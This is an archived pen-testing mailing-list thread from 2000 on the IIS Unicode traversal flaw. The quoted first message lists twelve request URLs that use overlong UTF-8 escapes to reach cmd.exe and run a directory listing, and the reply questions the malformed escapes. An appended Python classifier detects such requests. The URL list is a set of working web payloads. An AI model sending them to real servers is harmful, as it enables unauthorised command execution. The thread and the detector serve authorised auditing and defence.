Penetration Testing mailing list archives
Re: [PEN-TEST] IIS UNICODE Strings
From: Vitaly Osipov <vos () TELENOR CZ>
Date: Tue, 31 Oct 2000 21:19:53 +0100
Hmm... I see some *very* strange strings in your examples below, namely those:
http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
The second escaped symbol (%pc for example) is not a real escaped hex-code - if it works, then the problem is not in Unicode at all, but in something else - maybe IIS interprets anything which is after 0xc1, 0xc0 in some special way? Something like %9v -> 9*0x10+(code for "v" - code for "a") = 0x90 +0x16 = 0xa6? If I have some time tomorrow, I'll try to disassemble that dll of IIS which was patched by Microsoft and extract a real decoding algorithm from there... or maybe I do not understand something obvious regarding unicode :-S
regards, Vitaly.
----- Original Message -----
From: "Mike Ahern" <mc_ahern () YAHOO COM>
To: <PEN-TEST () SECURITYFOCUS COM>
Sent: Friday, October 27, 2000 9:35 PM
Subject: [PEN-TEST] IIS UNICODE Strings
I have been trying to track the various strings when I find them, and here is a list so far. I have tested many of these and found many to work on systems I am authorized to audit. Initial reports seemed to indicate that this was predominantly a foreign (non US English) web server problem, however I have found that there are many vulnerable US English servers. In initial tests I found one non-US web site and three US web sites vulnerable for a single client. That made me wonder how many internal file & print, exchange, sql, and other servers with IIS installed were vulnerable within the network. In my testing I have found a good number of internal US servers vulnerable as well. Certainly not the majority, but fairly well represented anyhow. I suspect this is a partial list of UNICODE strings... Happy Testing... -mch
http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
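As an added illustration of the decoding question Vitaly raises (this is not code from the thread or from IIS): a log-side classifier that percent-decodes a request path, then decodes the bytes the way a lenient UTF-8 decoder would, and reports malformed escapes such as %pc or %9v, overlong sequences such as %c0%af and its longer forms, and any ".." path segments that only appear after decoding. The function names and finding labels are my own.

```python
import re

HEX2 = re.compile(r"[0-9A-Fa-f]{2}")
# (lowest lead byte, highest lead byte, continuation bytes, smallest legal
# code point). A decoded value below the minimum is an overlong form, the
# trick behind %c0%af -> '/' and %c1%9c -> '\'.
UTF8_FORMS = [(0xC0, 0xDF, 1, 0x80), (0xE0, 0xEF, 2, 0x800),
              (0xF0, 0xF7, 3, 0x10000), (0xF8, 0xFB, 4, 0x200000),
              (0xFC, 0xFD, 5, 0x4000000)]
# A ".." segment delimited by '/' or '\' (or by the ends of the string).
DOTDOT = re.compile(r"(?:^|[\\/])\.\.(?=[\\/]|$)")

def percent_decode(path):
    """Turn well-formed %XX escapes into bytes; count malformed ones (%pc, %9v)."""
    out, bad, i = bytearray(), 0, 0
    while i < len(path):
        if path[i] == "%" and HEX2.fullmatch(path[i + 1:i + 3]):
            out.append(int(path[i + 1:i + 3], 16))
            i += 3
        else:
            bad += path[i] == "%"          # a '%' not followed by two hex digits
            out.extend(path[i].encode("utf-8"))
            i += 1
    return bytes(out), bad

def lenient_utf8(raw):
    """Decode like a naive decoder: overlong forms are accepted but counted;
    bytes that form no sequence pass through as Latin-1 and count as invalid.
    Returns (text, overlong_count, invalid_count)."""
    text, overlong, invalid, i = [], 0, 0, 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            text.append(chr(b))
            i += 1
            continue
        form = next((f for f in UTF8_FORMS if f[0] <= b <= f[1]), None)
        tail = raw[i + 1:i + 1 + form[2]] if form else b""
        if form and len(tail) == form[2] and all(0x80 <= c <= 0xBF for c in tail):
            cp = b & (0xFF >> (form[2] + 2))      # payload bits of the lead byte
            for c in tail:
                cp = (cp << 6) | (c & 0x3F)
            overlong += cp < form[3]
            text.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
            i += 1 + form[2]
        else:
            invalid += 1
            text.append(chr(b))
            i += 1
    return "".join(text), overlong, invalid

def classify(path):
    """Set of findings for one request path; empty means nothing suspicious."""
    raw, bad = percent_decode(path)
    text, overlong, invalid = lenient_utf8(raw)
    hidden = len(DOTDOT.findall(text)) - len(DOTDOT.findall(path))
    findings = set()
    if bad:
        findings.add("malformed-escape")
    if overlong:
        findings.add("overlong-utf8")
    if invalid:
        findings.add("invalid-utf8")
    if hidden > 0:
        findings.add("hidden-dotdot")
    return findings
```

A plain "../" in the raw path produces no finding here, since that form is visible to the server's own canonicalization check; the point of the classifier is the ".." segments that only exist after the overlong bytes are decoded.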